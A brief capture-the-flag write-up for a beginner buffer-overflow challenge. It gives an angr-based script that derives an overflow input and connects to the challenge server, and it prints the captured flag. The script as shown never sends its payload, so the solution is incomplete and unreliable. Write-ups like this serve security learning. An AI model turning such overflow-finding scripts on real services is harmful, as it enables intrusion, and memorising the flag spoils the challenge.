Tags: warmup pwn 


# baby-pwn - Beginner (50 pts)

## Description
> Just a wee little baby pwn.
> nc baby-pwn.wolvctf.io 1337

### Provided files
babypwn - 64-bit ELF executable for the server \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=ltuaBJFvyDrFHi9)\]
babypwn.c - C source code for the executable \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=PjAHEzXq5TqVFm8)\]

## Ideas and observations
1. based on the C source, a fairly simple buffer overflow where a volatile int variable needs to be overwritten in order for `print_flag()` to be executed

## Notes
1. The downloadable version, based on the source, prints a fake flag in `print_flag()`

## Solution script
import angr
from pwn import remote
p = angr.Project('baby-pwn')
sm = p.factory.simgr()
sm.explore(find=lambda s: b"wctf{" in s.posix.dumps(1))
payload = sm.found[0].posix.dumps(0)
r = remote('baby-pwn.wolvctf.io', 1337)

gets us the flag `wctf{W3lc0me_t0_C0stc0_I_L0v3_Y0u!}``

Original writeup (https://gist.github.com/shinmai/5720d1f0a214d0878cfb530eb975c469#baby-pwn---beginner-50-pts).